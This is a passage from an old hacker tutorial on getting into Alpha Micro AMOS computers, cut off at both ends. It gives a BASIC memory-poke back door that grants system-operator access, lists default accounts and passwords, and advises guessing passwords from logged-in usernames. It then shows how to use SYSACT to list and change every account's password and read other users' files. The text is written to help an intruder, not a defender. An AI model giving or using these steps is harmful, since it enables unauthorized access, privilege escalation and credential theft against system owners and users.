You have to be careful with how the programs are used. If used
inappropriately, they can do major damage to the computer. Many of the above
programs can only be executed from the operator account DSK0:[1,2].

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Entering via BASIC:

There is a back door in the version of BASIC that comes bundled with AMOS.
Depending on the type of security present, you can gain access to the system
operator account (DSK0:[1,2]), which gives you the power to do quite a few
things. What the command essentially does is poke into memory the appropriate
values to give you sysop access.

Type this in at the dot prompt (.):

    .BASIC

    AlphaBASIC Version 1.3 (217)

    READY
    #

Once inside BASIC, type in this command as seen below; it doesn't matter if
you use upper or lower case.

    WORD(WORD(1072)+20)=258
    BYE
    .#

The BYE command exits you out of BASIC and puts you back at the OS level. You
can also rename files and open files via BASIC. Depending on the security in
the system, if you typed in everything as above, you should be logged into
DSK0:[1,2], also known as OPR:. This is the system operator's account, from
which all types of commands can be issued.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

When you finally get connected to the system, you need some place to log in
to. There are certain default accounts on every system.
These are:

    OPR: --> DSK0:[1,2]
    SYS: --> DSK0:[1,4]
    DVR: --> DSK0:[1,6]
    CMD: --> DSK0:[2,2]
    LIB: --> DSK0:[7,0]
    HLP: --> DSK0:[7,1]
    BOX: --> DSK0:[7,2]
    BAS: --> DSK0:[7,6]
    MAC: --> DSK0:[7,7]

As you log around the different accounts, you will find that some have defined
"ersatz" names. This means that besides the [p,pn] specification, you can
access that account with a defined name. In the above examples, logging into
SYS: is the same as logging into DSK0:[1,4].

As mentioned previously, older models of the Alpha Micro did not have any
security built in to them. Later versions of the operating system have changed
this, though. Once you get connected and you try to log into an account, you
may be asked for a password. The word you type is not echoed on your screen.

Two default passwords that you can try for logging purposes are "DEMO" and
"SYSTEM SERVICE". These are not case-sensitive, so you can type them in either
upper or lower case. If neither of these works (which is unlikely, since
people are too lazy to change them), try running the SYSTAT command.

What happens is that you will often see people logged in under a short (6
digits or less) user name, such as JOHN, AMY, SUSAN, etc. Try logging in with
one of these as your PW. 80 per cent of the time it will work.

If you've gotten into the system this far, then good. There are lots of things
to do or access. If you're looking around for information, these are contained
in files that end in a .TXT extension. These may be examined by using the TYPE
command from AMOS. The syntax would be:

    .TYPE MODEM.TXT/P

The /P is not required, but is useful, because otherwise the file would be
displayed too quickly for you to look at. The /P switch displays the contents
one page at a time. Pressing will scroll through the text. One word of
warning: Don't use the TYPE command on .LIT, .SBR, or .OBJ files; doing so
will usually result in your terminal being locked up, effectively ending your
session.
Now let's say you wanted to check out the files that are in other accounts.
Usually all that is needed is to simply log there. However, certain accounts
will be passworded. There is no simple way to just dump the contents of a disk
block and see what the PW is. There are alternatives, however.

One method is to log into the operator account (DSK0:[1,2]) and use the SYSACT
command. This lets you do various things to the disk, but the one you would be
concerned about lists all of the accounts on a particular disk. The command
works like this:

    .#
    .SYSACT DSK0:

Use the "H" to get a listing of all the available commands from within SYSACT.

    *
    *h

    Implemented commands are:

    A PPN - Add a new account
    C PPN - Change password of an account
    D PPN - Delete an account
    E     - Rewrite MFD and exit to monitor
    H     - Help (Print instructions)
    I     - Initialize entire disk
    L     - List current accounts

The last one "L" is the one we're concerned with. Press after it to see a
listing of all the accounts on the disk. Passwords (if any) will be displayed
to the right. The "C" option will allow you to change the PW on an individual
account. Then press "E" to go back to the command level.

If you want to check out a file a little less elegantly, this may be done by
simply copying the file to an unpassworded account or by typing the file from
another account.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Account and file structure:

As explained before, there are accounts on the disk, which may or may not
contain files in them. AMOS maintains this account structure on the disk. In
fact, a listing of which files belong to which account is kept in the account
directory. There are two types of files that are possible on the Alpha Micro:
sequenti